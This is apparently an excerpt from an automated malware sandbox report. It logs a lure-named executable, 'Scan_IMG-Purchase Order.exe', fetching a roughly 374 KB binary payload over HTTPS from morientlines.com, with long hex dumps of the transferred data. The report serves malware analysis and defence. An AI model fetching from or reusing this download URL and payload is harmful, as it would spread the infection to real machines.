eb fd 2e 56 38 e9 16 7d 8c ea 81 6e ae b2 5b 52 6f 81 66 fa 25 7d 0f 96 36 f2 cd 0e 96 ac b2 33 62 62 4e 72 b6 15 84 40
31 3b 6b d7 e1 b3 c1 41 b2 d1 15 a8 43 34 72 a1 73 bd 19 57 42 fe a3 88 2d 55 6f 04 2d 6e 6d f0 b5 5e 14 45 7a 7a 77
b0 4f ce e5 82 00 19 30 d6 7f 2a 5d d8 be c0 53 5b 30 45 f0 f7 9b f1 b9 0f a4 83 25 0a 98 e0 99 42 d2 7c b2 ee 3e c5 6c
4d 2e ba f2 ec f9 e6 88 8f 2e aa fd 95 79 bd d3 03 63 03
Data Ascii: -%tcHPt )d}i;r4z=9jzEW{;G.;7A7/^Dv_Q-A6N.H(+tV?'.V8}n[Rof%}63bbNr@1;kAC4rsWB-Uo-nm^EzzwO
0*]S[0E%B|>lM..yc

2022-07-25 13:50:54 UTC 289 IN Data Raw: 4b 65 93 d3 3a b6 61 59 85 2c 4e ca 3e 2b 72 a5 7c 0e de 1f 8f 2e 30 6e a9 fa 56 9e 65 62 09 ab e8 ff 04 31

84 b3 8d 8d fb a7 61 0b 7b bc 78 7c 74 2b 79 77 3d 0d 8a 26 8a c6 e7 95 92 59 5c 57 11 c2 ba 39 7b 26 d4 26 c1 ea ba
8d b4 9e ea 14 3b eb 8b 4e cf 41 4a d9 ed 77 15 ce d3 05 43 7f df ad ee 8d a9 e3 dc dd fc 14 a1 f2 18 3c d0 5f a4 a3 b5
8e 30 7d d5 00 ac 31 9e 75 cc 46 f1 09 5e b7 f7 46 ec bf d3 62 d7 57 7c fa 83 c9 87 2b 50 ff e5 ce f8 57 02 f0 5d fb b2 7c
bd 81 32 45 21 44 64 a2 62 21 e9 d9 76 92 d2 ff b3 a3 18 72 95 f5 e6 31 51 1f 1f dd ec 12 37 c8 48 0e be 20 7b c2 e6 c2
b7 06 3c 5b 2a 25 5e b0 ea f3 06 ff 67 bd d0 d9 c0 3a 7f 22 91 4b f1 79 7e fb 57 1f 9a 52 dd cf fe 7c 0c 38 d2 4c 33 53 e5
8f 19 50 07 d3 e7 18 b8 77 6a 4e 06 e4 00 19 bb d4 39
Data Ascii: Ke:aY,N>+r|.0nVeb1a{x|t+yw=&Y\W9{&&;NAJwC<_0}1uF^FbW|+PW]|2E!Ddb!vr1Q7H {<[*%^g:"Ky~WR|8
L3SPwjN9

2022-07-25 13:50:54 UTC 297 IN Data Raw: 88 d4 25 a8 f4 55 1d 2a 06 b8 33 ae 49 d9 a6 d4 3c fb f5 9f f9 c7 5f 99 fc b1 c9 74 9f 97 46 6c 4b 2e 8f 9c c4 39

d4 89 12 f3 86 af 35 80 12 3a bc c0 fe 72 cf 8c f0 c9 99 02 5f b3 2e 9c ac dc 98 d4 2c 67 d3 72 80 64 a5 31 a5 4d af 36 56
e0 66 86 56 55 3c 2d 07 df c6 eb d5 37 9a 01 7e ba 8c fd 1f d2 76 57 30 5e e6 e8 09 b6 cc be 68 f4 77 8e 18 54 3b ee 31
b6 64 13 8d 83 fc 23 ec c2 c2 dd e4 48 3f b8 cb a6 a4 96 61 3f 84 17 95 22 b1 45 9b c3 1f 8a 26 94 d6 e5 d2 33 e8 53 0e
e3 35 93 b9 b0 aa 72 15 19 ed 16 4f fd e1 46 9b 4d 92 6e 40 54 24 7e f4 07 2e 36 fb b5 cc fb 99 59 42 71 95 c0 a5 70 46
25 14 c3 df 4e f3 b9 2e 58 95 b3 b9 fa a5 9c 31 d0 5d 1c 2d 34 07 3d f1 79 be f7 f6 80 f5 9e 10 d2 ad e7 4e c4 36 94 63 d3
78 bc 06 62 df 2f b7 58 07 0c 7d dd 87 62 23
Data Ascii: %U*3I<_tFlK.95:r_.,grd1M6VfVU<-7~vW0^hwT;1d#H?a?"E&3S5rOFMn@T$~.6YBqpF%N.X1]-4=yN6cxb/X}b#

2022-07-25 13:50:54 UTC 305 IN Data Raw: 16 a6 98 2c 82 08 c8 ec 3b a1 e0 c3 9e d3 4b 6e b8 ae 92 35 b6 cf 7b 7a 10 05 11 a2 dd 36 2c 39 9a b4 52 e6

14 ea 40 4b 2b 93 d4 3f ec 19 94 d5 a9 e0 da a6 31 db c4 2e 2b 11 58 31 f3 97 80 e3 97 4b e6 ac 47 72 1f ea 5d 70 f0 f9
8d f6 0b 87 38 49 60 4f fe 34 44 32 06 1e 79 25 47 bb ee d4 a2 80 c0 76 58 3a f0 17 28 65 29 86 64 b0 0c 90 97 f5 e7 42
53 87 31 e9 b5 d4 73 92 7e 47 b1 58 36 8a ea 4e b6 b2 c7 44 83 02 28 4e 45 1a 5a 5a 25 f5 f2 a7 ea a6 de 4e 34 23 90
58 ce 5b 53 a1 eb 2d 89 c3 33 c4 0a 3b ec 85 aa 4a 36 82 55 bc 4b cc 33 45 17 fd 4b f6 0f c3 5b 6f 97 4e d5 6b 66 7d 8f
44 ff f3 96 45 b2 ad c4 4b d0 7f 1f 65 85 ba 55 6e bc 3e 7e fc 05 74 54 f8 fe 84 f9 27 d3 9f e8 df 36 fe 01 ff d1 46 4d f8 a9
fc d1 f4 f6 8a 70 86 d1 d5 f4 2c 74 e0 c7 87 d8 8a 72
Data Ascii: ,;Kn5{z6,9R@K+?1.+X1KGr]p8I`O4D2y%GvX:(e)dBS1s~GX6ND(NEZZ%N4#X[S-3;J6UK3EK[oNk
f}DEKeUn>~tT'6FMp,tr

2022-07-25 13:50:54 UTC 313 IN Data Raw: b7 8e da cb e0 00 a4 1a 35 b7 da f4 7b 5d d9 ff f4 d7 0c e6 68 7d 4f 5c b3 70 c0 22 aa ec 7b 44 b0 de be 20 ff

80 04 86 8e e3 88 4b 8f 81 cb 08 a1 f3 86 7d 3f b8 66 ea da d4 75 58 d5 e9 50 e3 0c 32 9b 0b 63 1e 1e 17 96 87 38 6f fd
64 d6 38 8e 04 97 4f 52 cd 64 cb 50 fc 62 c8 4a 2e 4b 69 4e 8a 21 09 c8 fa 1c 17 1b 9d c4 57 7a f3 8b 1f 67 c1 d9 da 97
16 bb eb ec 86 5c 34 ec 8c d7 c5 cc fa 8f 7a b3 33 ed 1f 48 c1 c4 74 ce 49 29 85 a4 51 c9 93 ef e7 88 83 69 60 dc bb 10
eb 7d e0 75 83 da 57 3e 12 09 d2 81 24 2f f2 b3 c3 38 53 38 fd 1a a1 27 5c 02 fb 77 9d ed 23 39 7f 1c af ec bc e5 7b f8
44 94 cc 71 48 dd 26 82 c2 84 75 72 3c 18 02 96 30 e3 34 8e d2 36 c1 93 92 7f c2 88 58 42 29 cd 79 38 2d 92 01 a6 db
b0 db c4 f7 73 bf a5 0f 2d 85 e6 3a 33 58 be ba 0b cd 9d
Data Ascii: 5{]h}O\p"{D K}?fuXP2c8od8ORdPbJ.KiN!Wzg\4z3HtI)Qi`}uW>$/8S8'\w#9{DqH&ur<046XB)y8-s-:3X

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:50:54 UTC 320 IN Data Raw: 36 c6 02 44 75 dc 5e 22 11 e7 91 0d d7 5b 4c 7d 1b 4b 65 9b e5 52 dc dc df 0c a0 1e 5f aa 49 42 d8 b4 36 68

e8 43 24 01 2d 68 aa 9d 72 8a de a6 07 95 c4 b8 e8 e2 cc 30 18 83 3f 69 b4 c2 78 5b 77 b4 81 06 1a a3 96 43 23 c5 c6
59 87 03 2b de 75 0c da 84 41 8e 84 00 1c 77 4c 06 1b 08 92 17 25 e7 e8 1e 73 bb 15 b6 62 ec 49 f3 c1 08 e2 23 98 84
eb 43 52 29 a4 59 4b a7 a6 2f 20 d7 20 8b c2 28 4e d2 a3 43 fa 06 6e 98 e5 3a c4 4d 68 b9 8c b1 8c 9e a5 2d e5 cb 83 d
b 2e 9c 2e f2 7d bf 57 95 e7 ed 26 17 9d e2 12 c1 8a 0a 41 4e c5 39 c7 31 90 97 0d a2 c9 0d 32 45 ef 1c ed 33 75 5a 8e 6
7 a0 bc cb 47 a7 54 cc 34 25 0e 73 51 1c a0 2a f0 dd 1a d8 60 ed 5a d4 a1 ee 00 a8 ad 17 d8 88 e7 83 22 52 50 b8 83 b5
2c 91 81 9a d4 76 97 52 0f de 6e af 3c 69 b0 e5 28 31 61 11 c3 98
Data Ascii: 6Du^"[L}KeR_IB6hC$-hr0?ix[wC#Y+uAwL%sbI#CR)YK/ (NCn:Mh-..}W&AN912E3uZgGT4%sQ*`Z"RP,vRn<
i(1a

2022-07-25 13:50:54 UTC 328 IN Data Raw: 34 7f 7d 8d db 64 7e bf 89 d9 4c 21 4f 75 3c 3b 1a 27 dc ff ee 77 94 f7 a3 dd c3 e1 fb 57 a1 f9 4e 58 da a6 74

56 e9 ce b9 8a d8 94 08 35 69 ed 30 9f 92 5f 67 8d 2e 73 1e 02 ed 41 3d a8 93 b6 23 3d bb fa cf 3e fc 75 f9 41 07 89 c7
98 f3 8b cc c6 e9 0c 4c 5d be 4e 55 25 99 99 d7 a9 25 14 f6 84 5f 83 26 2c 53 4a d7 fd 9f bc 35 bd 54 48 81 e9 ed 09 19
d2 5e e7 ec 8c 21 7f 2a 1e fa 66 95 d0 28 9c f6 d6 b1 72 fd 93 ed 31 68 97 12 34 e1 fc be 4d 2f 3a ff 43 1a cb ea 51 a8 61
7f 41 cb f2 81 21 14 9c 34 84 e4 8d 24 44 c2 74 9e 93 46 c3 dc 94 15 15 e7 38 14 59 c6 1b bc f6 30 30 e9 42 5a 25 47 4e
0b 5e 8b 64 bc f4 04 1a c7 fa a5 1a 8b 60 ba 75 a8 39 3b 99 53 27 c6 c1 02 df 64 2d a7 8e 0d e4 db 52 5e a4 55 53 98 41
17 47 e6 c8 f6 c4 bb 09 27 d4 f6 e7 a0 4c 80 95 93
Data Ascii: 4}d~L!Ou<;'wWNXtV5i0_g.sA=#=>uAL]NU%%_&,SJ5TH^!*f(r1h4M/:CQaA!4$DtF8Y00BZ%GN^d`u9;S'd-R^
USAG'L

2022-07-25 13:50:54 UTC 336 IN Data Raw: ba 0f bf fc c8 5b ce f4 48 fe 72 17 61 5f 1f ca 85 f7 fd 91 84 08 1e d1 15 dc 38 93 1c d3 dd 8e b9 52 46 7b 52

a4 de b7 e4 ca 02 84 a6 d7 50 0f d6 e6 f7 40 26 78 5a c0 f3 18 0e 32 5f 68 6b 11 96 3b 17 db 2c 72 3e aa 1d 91 19 50 49
ef 50 38 16 83 6e 1f be 58 d9 ae 1a b2 f6 e0 fc 04 a6 10 f0 68 0a 6e 7a 22 ac 68 4e 2d 28 ad f9 ee 70 a9 9f 01 55 86 a8
d5 05 cb 37 8a bd 74 3b cc a4 21 4c d9 5a 87 68 37 99 c5 96 ee 48 69 e2 2a 02 92 91 8e 1f 37 92 8b f1 09 f3 f0 4f 86 0e
f5 22 21 2d a5 91 64 a9 9c 33 34 5f 67 51 e6 85 40 f5 de bc 13 63 e9 3a ed e1 ec 13 99 db 8f 74 3e 4e 1f 2a a8 96 d0 d4
25 de 5d 19 30 fd cf 68 bf 3f d6 41 71 2e 3a bd e4 cb 98 1d a8 04 36 de 67 fc 03 b5 3f 52 30 84 28 d0 a5 b0 26 64 29 3a
ec ed 9e 2c c9 0c 20 42 40 ac cf ee 05 f0 30 bb 63 29
Data Ascii: [Hra_8RF{RP@&xZ2_hk;,r>PIP8nXhnz"hN-(pU7t;!LZh7Hi*7O"!-d34_gQ@c:t>N*%]0h?Aq.:6g?R0(&d):, B@0c)

2022-07-25 13:50:54 UTC 344 IN Data Raw: f1 7a a5 94 4e d7 85 b1 de d7 f5 4e 6c 6f 81 58 a4 fb fd 8f 9d dd 2f 0c fb 9a 55 89 c7 6d 72 49 2a 17 14 4a 5d

48 97 47 20 84 c5 22 d8 ac 98 d0 c0 7d 53 05 0e 4d f3 d7 95 da 4a b8 00 9b dd 8b 97 0e c9 d3 09 a5 f0 93 be fc 19 69 cc
44 65 9d cb 4c 20 4f 41 e4 f9 f8 14 94 41 92 6c 86 95 e2 25 81 22 94 4d 02 ca 72 d9 66 e1 43 92 d1 ac dc d9 63 57 5f 55
45 bc 06 c5 38 0d 35 80 af 4a 4a 11 b2 86 f6 73 2b e2 71 44 7a 6a 0b 6f d9 ee 43 1a d9 0b 3c cf 07 5c e3 f9 c1 9f 58 64
7b 75 54 c0 5a ff 9e cd 19 02 42 da 16 21 98 16 ef 2b e9 09 58 0a c7 b5 a8 a3 b7 52 47 5b a8 83 a5 7f 8d 86 0d 73 38 17
24 b2 96 b1 ee 4e 1d c0 dd 83 50 c8 b5 4b f7 3f 96 f4 77 ab e9 2f fe 54 bf 90 26 f5 81 4d ae c2 40 40 e5 91 c1 b5 d5 41 b5
8c 71 79 0b b7 74 a4 39 f6 c0 9f 9f 00 a6 c7 85 7d
Data Ascii: zNNloX/UmrI*J]HG "}SMJiDeL OAAl%"MrfCcW_UE85JJs+qDzjoC<\Xd{uTZB!+XRG[s8$NPK?w/
T&M@@Aqyt9}

2022-07-25 13:50:54 UTC 352 IN Data Raw: 3d 40 68 2e e2 3e f5 42 1d 6a 80 72 30 66 01 a4 f9 25 2f d4 42 55 7e 0d bc eb d2 23 99 b3 e5 59 8d ee 7f 6f

65 cb 3f 04 7c 1b 0f 74 ae a0 f3 66 56 e2 0b 85 de dc f1 c6 ff 3c 76 7b 80 29 cf 7f 6a 57 96 57 ee a0 4f e6 4d 45 a0 08 e2
17 6b 37 ee 07 7c 6c 88 e9 d3 0b 9e ba 73 d8 2f 33 d2 a0 cc e5 80 eb f6 18 00 0d 3c 32 88 66 14 32 a7 ff fa 81 bd a3 ca
14 c8 01 81 f4 ec 80 be 1f 80 c0 10 b3 67 20 73 33 97 a1 62 eb 35 2f 4a da 87 52 37 20 53 5c 15 17 ec 91 9c 63 84 8f e7
ab b1 c4 c7 3e 4b 34 e4 9c 0d 27 ed d4 ba 95 b2 8e 66 29 26 4a 31 ef 6f fe 3c 04 75 42 71 04 97 84 13 0d 11 02 46 c2 ef
4b df d9 22 e9 24 0d f4 ab 74 49 f0 38 65 6d 5b 71 6b 00 cd 0c ae 9c db ff 5c d0 a2 2b 28 4d d1 81 62 55 22 a9 64 cc b2
f0 e2 19 a6 18 1b 6c a0 06 bd cd 34 e1 62 18 12 73 bb
Data Ascii: =@h.>Bjr0f%/BU~#Yoe?|tfV<v{)jWWOMEk7|ls/3<2f2g s3b5/JR7 S\c>K4'f)&J1o<uBqFK"$tI8em[qk\+(
MbU"dl4bs

2022-07-25 13:50:54 UTC 360 IN Data Raw: 3f 0d 4e a6 5a 97 47 54 85 df 6c 53 27 04 d0 5a 80 d9 96 0d ba 5b 5a e9 fc 87 40 dc 95 71 71 6e 9a 3b f7 30

e1 5a 67 e7 4f 2e b8 a4 60 ff 0f 14 39 1a 54 cd d5 50 70 ce 00 5d 5f 11 aa ff 44 95 b3 b5 41 5c 85 7c b6 48 73 a5 31 0e
81 8e 74 82 02 b3 53 af c0 db 5f 2a 7d 22 c0 48 4e ab fb 36 d0 32 53 31 58 49 42 1e 9a 31 ad c4 70 81 a2 ed 09 88 70 f6
be 5f a0 44 4e 59 73 01 06 5e 7e d7 9e 5e 14 d7 d8 31 2b ea bf fb 8f f5 d0 91 1d 4f 99 9a 59 d0 a0 23 67 55 79 2e e7 a7
6f ad 5c 73 2d ce 19 dc e5 2d b4 3d c2 b3 f7 ec ef dd 37 fc 93 35 20 fd 37 7b b7 a8 14 e7 05 2f 94 f7 16 f3 a3 25 11 50 05
5e 43 ae 5a 79 53 61 de 55 79 96 c1 b4 16 39 d9 c8 4a b8 bc 6f 0b e1 6d 21 1f 2f 52 5a 78 93 d4 e8 56 0b 28 9f 5c 50 7b
8c 22 22 b6 96 cf bb 97 6f 1e 34 40 0e 12 b7 9b 94 d1
Data Ascii: ?NZGTlS'Z[Z@qqn;0ZgO.`9TPp]_DA\|Hs1tS_*}"HN62S1XIB1pp_DNYs^~^1+OY#gUy.o\s--=75 7{/%P^CZy
SaUy9Jom!/RZxV(\P{""o4@

2022-07-25 13:50:54 UTC 367 IN Data Raw: 4c 6b d2 66 d8 3f 20 fb 6a 78 c3 bc 0b 27 09 68 5f 2f dc 12 c3 da 57 97 d7 b5 d0 20 2d c8 3a af 90 f3 dc f5 46

04 81 24 62 da c0 b1 ea 3e 60 a8 56 7a c0 57 19 7a 48 fa 0c 1e 75 f5 e1 c2 25 fe a8 da b1 87 3a 98 78 71 f6 40 9f 05 96
1f ed 6a a9 db ea 3f cf db 08 4b 49 0f ae 33 dc 53 cf 5b d3 73 38 80 db 5d 25 45 1d c4 40 3f df ce b1 b4 0d 4f c0 eb f5 c9
bf 90 1a 05 cf 10 ee f0 d4 fd b5 e3 9b 63 17 e5 ca ae cf 6e f8 8c 74 ef 29 6e fc 1c 79 a9 72 01 22 18 db 1d 70 9c 57 93 cd
22 45 77 bc 1e eb b4 0d 36 fd 7d 5c 9c d6 82 99 f5 54 35 b2 9a cb ca 7d 7b 9b 66 66 83 0d 12 07 2d d7 c2 e2 15 97 e0
2e 7f e6 fe 55 c2 eb 21 64 85 25 15 58 73 ff 55 09 47 ed 56 6b d2 04 a8 a7 26 53 73 4c be b4 9f ef 82 3a 7b 81 2e 9c 7b
24 72 a4 cc a4 c2 df 82 59 3b f0 ad ef 15 4b e0 28
Data Ascii: Lkf? jx'h_/W -:F$b>`VzWzHu%:xq@j?KI3S[s8]%E@?Ocnt)nyr"pW"Ew6}\T5}{ff-.U!d%XsUGVk&SsL:{.{$rY;K(

Destination
Session ID Source IP Source Port Destination IP Process
Port

2 192.168.2.4 49773 103.11.189.121 443 C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:30 UTC 374 OUT GET /xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqutylctxlkglsugzstqx HTTP/1.1

User-Agent: 87
Host: morientlines.com
Cache-Control: no-cache

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:31 UTC 374 IN HTTP/1.1 200 OK

Date: Mon, 25 Jul 2022 13:51:30 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Last-Modified: Mon, 25 Jul 2022 02:21:51 GMT
Accept-Ranges: bytes
Content-Length: 374272

2022-07-25 13:51:31 UTC 374 IN Data Raw: 83 24 5a ca 39 ca ca ca ce ca ca ca 35 35 ca ca 82 ca ca ca ca ca ca ca 0a ca ca ca ca ca ca ca ca ca ca ca ca

2022-07-25 13:51:31 UTC 382 IN Data Raw: ca ca f7 b2 43 b9 c2 3d 40 3b 82 3d ca ca ca c1 92 7c 35 9c ac 52 89 1b f7 aa 43 30 3b fa 41 30 bf 79 c6 45 ed

2022-07-25 13:51:31 UTC 389 IN Data Raw: 9c 21 1b bf 0f 21 21 c1 0e ee d2 b2 d7 c4 35 35 91 8c ce ca f9 89 20 8d bf f9 bf a0 bf 05 b2 6c 35 35 35 c1 49

2022-07-25 13:51:31 UTC 397 IN Data Raw: 8a 35 5b 2a 0b 0c ca c1 8a 35 5b 26 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 1e

2022-07-25 13:51:31 UTC 405 IN Data Raw: 5f 27 95 f9 4a 2f 1a 45 bb ff c8 35 35 84 d2 ca ca ca ef da ca ca ca c3 ab dd 1f fc be 35 35 ed 37 21 cc ed ca bf

2022-07-25 13:51:31 UTC 413 IN Data Raw: 82 0c ca b2 df d5 35 35 c1 92 c1 49 c1 90 b2 cc 6c 35 35 c1 8b a6 d7 ee 82 0c ca b2 8f 9e 35 35 bb 8a 3e f4

2022-07-25 13:51:31 UTC 421 IN Data Raw: 9c ab 2b bf de ee b9 06 ee ca 45 4e db 37 ca ca c1 ce ee b9 42 de ca 45 4e 62 37 ca ca c1 ce ee c1 22 de 4a

2022-07-25 13:51:31 UTC 429 IN Data Raw: 22 35 35 1f ac ca ca ca c3 8b b6 d7 5a bf 0c ca b2 2a b5 35 35 c1 83 b6 7c 37 d7 82 17 0a ca b2 5b 03 35 35

2022-07-25 13:51:31 UTC 436 IN Data Raw: bf 8b be 1f c1 ca ca ca c1 7b c6 c1 0a d2 45 80 ca 69 9c bf 7b ba bf 8b be 21 42 c1 7b c6 c1 0a d2 45 ed ca 69

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:31 UTC 444 IN Data Raw: 8f 22 35 35 c1 8b 6e c1 90 b2 6d ea 35 35 1f f5 ca ca ca c3 8b 6a c1 79 d2 45 80 ca b2 06 22 35 35 c1 8b 6a

2022-07-25 13:51:31 UTC 452 IN Data Raw: 81 b9 31 35 ab b2 69 8a 24 8f 8f 2e bf da 32 62 0e 77 ca 32 7a 8c 0c ca b2 f6 5b 35 35 f9 1f 34 2f c8 35 21 b8

2022-07-25 13:51:31 UTC 460 IN Data Raw: bc c1 a2 69 8a 8b 32 ba 99 77 ca 2e 35 fa 2e bf ea c3 7b c6 c1 0d b2 50 b4 c8 35 c1 83 c6 c1 a0 c1 f9 b2 48

2022-07-25 13:51:31 UTC 468 IN Data Raw: c1 e2 35 89 d6 c1 7b a6 bf 7b a2 c1 7b a2 bb 8a 3e 3b b9 b2 ce c1 ca c1 8b c2 bb 9c 3e 3b b9 b4 ce c1 dc 39

2022-07-25 13:51:31 UTC 475 IN Data Raw: ca b2 a5 f6 35 35 b2 bc c8 35 35 82 aa 8c 0c ca b2 2a f6 35 35 82 96 8c 0c ca b2 c0 88 c8 35 69 8a 24 8f 8f 2e

2022-07-25 13:51:31 UTC 483 IN Data Raw: 7b c6 b2 28 52 c8 35 c1 7b c2 b2 20 52 c8 35 69 8a 8b 32 de 8c 77 ca 2e 35 fa 2e bf ea c3 8b be c1 7b c6 b2

2022-07-25 13:51:31 UTC 491 IN Data Raw: bb 8a 46 f4 0a c3 1e ee d2 c3 16 ee 12 45 80 fc 45 80 6f 61 2d bb c0 3e da bb c0 48 3d 88 37 ca ca ca 21 79

2022-07-25 13:51:31 UTC 499 IN Data Raw: ca 0c a5 3e 32 ca ca ca ca 35 35 35 35 3d ca ca ca 18 9b ab 3e 3c 97 36 ca 89 20 c1 a4 c1 ba c1 f9 c1 a0 b2

2022-07-25 13:51:31 UTC 507 IN Data Raw: ca b2 19 5d c8 35 c1 bb ea 35 35 35 24 b2 11 bc 35 35 32 fe ea 0c ca 35 00 32 2a ea 0c ca c3 bb e2 35 35 35

2022-07-25 13:51:31 UTC 514 IN Data Raw: c1 bb 86 c8 35 35 1a c3 bb 82 c8 35 35 84 6a 2e 0c ca b2 5c c6 33 35 c1 bb 82 c8 35 35 24 b2 d8 13 35 35 c3

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:31 UTC 522 IN Data Raw: ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca

2022-07-25 13:51:31 UTC 530 IN Data Raw: ca 16 13 cc ca 2c 13 cc ca 40 13 cc ca 54 13 cc ca 66 13 cc ca 7c 13 cc ca 90 13 cc ca 9c 13 cc ca aa 13 cc

2022-07-25 13:51:31 UTC 538 IN Data Raw: 73 b9 73 cf 73 d3 73 d7 73 db 73 df 73 e3 73 e7 73 88 73 c8 73 3a 08 ad 08 58 08 5c 08 60 08 64 08 68 08 6c

2022-07-25 13:51:31 UTC 546 IN Data Raw: 57 4e 25 25 c4 b0 1f c2 c8 ae 35 ae 35 aa c8 1f 31 23 19 ae 23 c2 17 84 27 33 02 c8 c2 b0 2f ae 33 ba 23 2f 1f

2022-07-25 13:51:31 UTC 554 IN Data Raw: a3 ec 87 4f 2b 1a 95 d1 4d e9 e8 2c c4 80 05 fe eb 77 1a 7a 5f 11 45 68 60 11 19 20 51 d7 90 6e 97 d2 0d 5c

2022-07-25 13:51:31 UTC 561 IN Data Raw: 8e f3 50 af 9e ea 47 5c 9f 2e ed de f0 4a cb ee 1e 1c d7 15 f7 da 3d 7c 84 89 f3 3b 26 3c 25 52 e1 6d 12 93 8f

2022-07-25 13:51:31 UTC 569 IN Data Raw: be 74 97 73 a7 90 42 50 3b fd 78 a0 6a 84 83 02 9c e4 e3 cb 1e ed 2e 5f 96 a8 a1 b9 f0 e2 5b 10 2e 62 a1 85

2022-07-25 13:51:31 UTC 577 IN Data Raw: d6 fd ce 5c 8d 23 ae 69 23 1e de 32 3d cd 99 01 1b 24 75 17 d9 32 c2 b5 f8 a7 c1 a0 db 23 69 3f a7 82 c2 e3

2022-07-25 13:51:31 UTC 585 IN Data Raw: 31 d0 df b4 7f a4 01 39 1a 4f e3 6b 65 04 c0 a0 d2 f4 15 e6 ea 58 b7 80 44 14 da 23 b8 7d 69 20 d2 79 6a 8d

2022-07-25 13:51:31 UTC 593 IN Data Raw: c9 ed 60 dc 9c 23 9b 59 eb 12 ce cc a8 7b a2 74 a3 ad 62 05 46 95 db 0d c8 cf 4d 74 52 25 74 79 8a 3b 43 8b

2022-07-25 13:51:31 UTC 600 IN Data Raw: 8c 34 ff 3f b0 8c 01 61 3d 6a 7e f8 6d c8 a7 49 7c d2 c7 97 84 a1 7f 92 c1 98 33 e0 92 6d 24 44 2b 87 54 c0 06

2022-07-25 13:51:31 UTC 608 IN Data Raw: e5 ed a4 ee 69 a9 8b 41 79 2c 42 3c 78 20 82 57 77 c8 d9 0b 8d d4 1d 88 37 cb 26 5f ea 15 d6 8d cc 35 f9 fe

2022-07-25 13:51:31 UTC 616 IN Data Raw: 2d c5 65 63 99 dd b1 b5 9f f9 0e 41 31 fe 0f 50 67 db 6d 42 44 78 7c d0 40 0b 1b a8 da b9 d6 13 d9 f3 37 34

2022-07-25 13:51:31 UTC 624 IN Data Raw: 13 12 94 7c 5f 62 5e 1d fb 62 b8 8b f2 7d f4 23 ac d7 79 25 30 bd 90 9d 35 0c 02 71 f6 f6 e5 c7 77 04 74 cd 76

2022-07-25 13:51:31 UTC 632 IN Data Raw: b3 ac 10 56 9c 6f f7 05 cd ea 43 49 56 16 b0 2e d9 3d c3 db 1b c7 2a 1b 0a 60 50 3b d9 d5 f0 33 f6 3c 34 75

2022-07-25 13:51:31 UTC 639 IN Data Raw: f0 c8 f0 79 17 7f e2 47 73 2c 73 3c 2d 37 9d 9b 47 0d 5c 8a 16 37 97 55 d0 26 c4 b5 98 97 aa d9 6a 55 e3 6a

2022-07-25 13:51:31 UTC 647 IN Data Raw: 2d 25 e7 c2 9e 74 cd 98 63 48 a6 50 a9 74 b7 b8 82 20 f5 88 29 0d 64 b6 bb 7d 69 3b d2 72 82 34 95 1e 7a 15

2022-07-25 13:51:31 UTC 655 IN Data Raw: 4b 65 93 d3 3a b6 61 59 85 2c 4e ca 3e 2b 72 a5 7c 0e de 1f 8f 2e 30 6e a9 fa 56 9e 65 62 09 ab e8 ff 04 31

2022-07-25 13:51:31 UTC 663 IN Data Raw: 88 d4 25 a8 f4 55 1d 2a 06 b8 33 ae 49 d9 a6 d4 3c fb f5 9f f9 c7 5f 99 fc b1 c9 74 9f 97 46 6c 4b 2e 8f 9c c4 39

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:31 UTC 671 IN Data Raw: 16 a6 98 2c 82 08 c8 ec 3b a1 e0 c3 9e d3 4b 6e b8 ae 92 35 b6 cf 7b 7a 10 05 11 a2 dd 36 2c 39 9a b4 52 e6

2022-07-25 13:51:31 UTC 679 IN Data Raw: b7 8e da cb e0 00 a4 1a 35 b7 da f4 7b 5d d9 ff f4 d7 0c e6 68 7d 4f 5c b3 70 c0 22 aa ec 7b 44 b0 de be 20 ff

2022-07-25 13:51:31 UTC 686 IN Data Raw: 36 c6 02 44 75 dc 5e 22 11 e7 91 0d d7 5b 4c 7d 1b 4b 65 9b e5 52 dc dc df 0c a0 1e 5f aa 49 42 d8 b4 36 68

2022-07-25 13:51:31 UTC 694 IN Data Raw: 34 7f 7d 8d db 64 7e bf 89 d9 4c 21 4f 75 3c 3b 1a 27 dc ff ee 77 94 f7 a3 dd c3 e1 fb 57 a1 f9 4e 58 da a6 74

2022-07-25 13:51:31 UTC 702 IN Data Raw: ba 0f bf fc c8 5b ce f4 48 fe 72 17 61 5f 1f ca 85 f7 fd 91 84 08 1e d1 15 dc 38 93 1c d3 dd 8e b9 52 46 7b 52

2022-07-25 13:51:31 UTC 710 IN Data Raw: f1 7a a5 94 4e d7 85 b1 de d7 f5 4e 6c 6f 81 58 a4 fb fd 8f 9d dd 2f 0c fb 9a 55 89 c7 6d 72 49 2a 17 14 4a 5d

2022-07-25 13:51:31 UTC 718 IN Data Raw: 3d 40 68 2e e2 3e f5 42 1d 6a 80 72 30 66 01 a4 f9 25 2f d4 42 55 7e 0d bc eb d2 23 99 b3 e5 59 8d ee 7f 6f

2022-07-25 13:51:31 UTC 725 IN Data Raw: 3f 0d 4e a6 5a 97 47 54 85 df 6c 53 27 04 d0 5a 80 d9 96 0d ba 5b 5a e9 fc 87 40 dc 95 71 71 6e 9a 3b f7 30

2022-07-25 13:51:31 UTC 733 IN Data Raw: 4c 6b d2 66 d8 3f 20 fb 6a 78 c3 bc 0b 27 09 68 5f 2f dc 12 c3 da 57 97 d7 b5 d0 20 2d c8 3a af 90 f3 dc f5 46

Destination
Session ID Source IP Source Port Destination IP Process
Port

3 192.168.2.4 49775 103.11.189.121 443 C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:38 UTC 739 OUT GET /xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqutylctxlkglsugzstqx HTTP/1.1

User-Agent: 66
Host: morientlines.com
Cache-Control: no-cache

2022-07-25 13:51:39 UTC 740 IN HTTP/1.1 200 OK

Date: Mon, 25 Jul 2022 13:51:38 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
